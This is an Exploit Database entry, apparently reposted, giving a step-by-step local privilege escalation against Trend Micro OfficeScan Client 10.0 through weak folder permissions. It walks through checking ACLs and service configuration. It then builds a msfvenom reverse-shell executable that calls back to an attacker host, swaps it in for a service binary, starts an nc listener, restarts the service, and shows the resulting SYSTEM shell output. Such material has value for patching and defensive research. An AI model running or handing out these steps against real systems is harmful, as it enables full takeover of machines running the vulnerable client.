Trend Micro OfficeScan Client 10.0 – ACL Service LPE

• Exploit Database
• 32 阅读

• 作者： msd0pe
  日期： 2023-05-23
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51453/

• #Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE 
  #Date: 2023/05/04 
  #Exploit Author: msd0pe 
  #Vendor Homepage: https://www.trendmicro.com
  #My Github: https://github.com/msd0pe-1 
  
  
  Trend Micro OfficeScan Client:
  Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.
  
  [1] Verify the folder rights:
  > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"
  
  C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
   NT SERVICE\TrustedInstaller:(CI)(IO)(F)
   NT AUTHORITY\SYSTEM:(F)
   NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
   BUILTIN\Administrators:(F)
   BUILTIN\Administrators:(OI)(CI)(IO)(F)
   BUILTIN\Users:(F)
   BUILTIN\Users:(OI)(CI)(IO)(F)
   CREATOR OWNER:(OI)(CI)(IO)(F)
   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
  
  [2] Get informations about the services:
  > sc qc tmlisten
  
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: tmlisten
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : OfficeScan NT Listener
  DEPENDENCIES : Netman
   : WinMgmt
  SERVICE_START_NAME : LocalSystem
  
  OR
  
  > sc qc ntrtscan
  
  SERVICE_NAME: ntrtscan
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : OfficeScan NT RealTime Scan
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  [3] Generate a reverse shell:
  > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
  
  OR
  
  > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe
  
  [4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe
  
  [5] Start listener
  > nc -lvp 4444
  
  [6] Reboot the service/server
  > sc stop tmlisten
  > sc start tmlisten
  
  OR
  
  > sc stop ntrtscan
  > sc start ntrtscan
  
  OR
  
  > shutdown /r
  
  [7] Enjoy !
  192.168.1.102: inverse host lookup failed: Unknown host
  connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
  Microsoft Windows [Version 10.0.19045.2130]
  (c) Microsoft Corporation. All rights reserved.
  
  C:\Windows\system32>whoami
  
  nt authority\system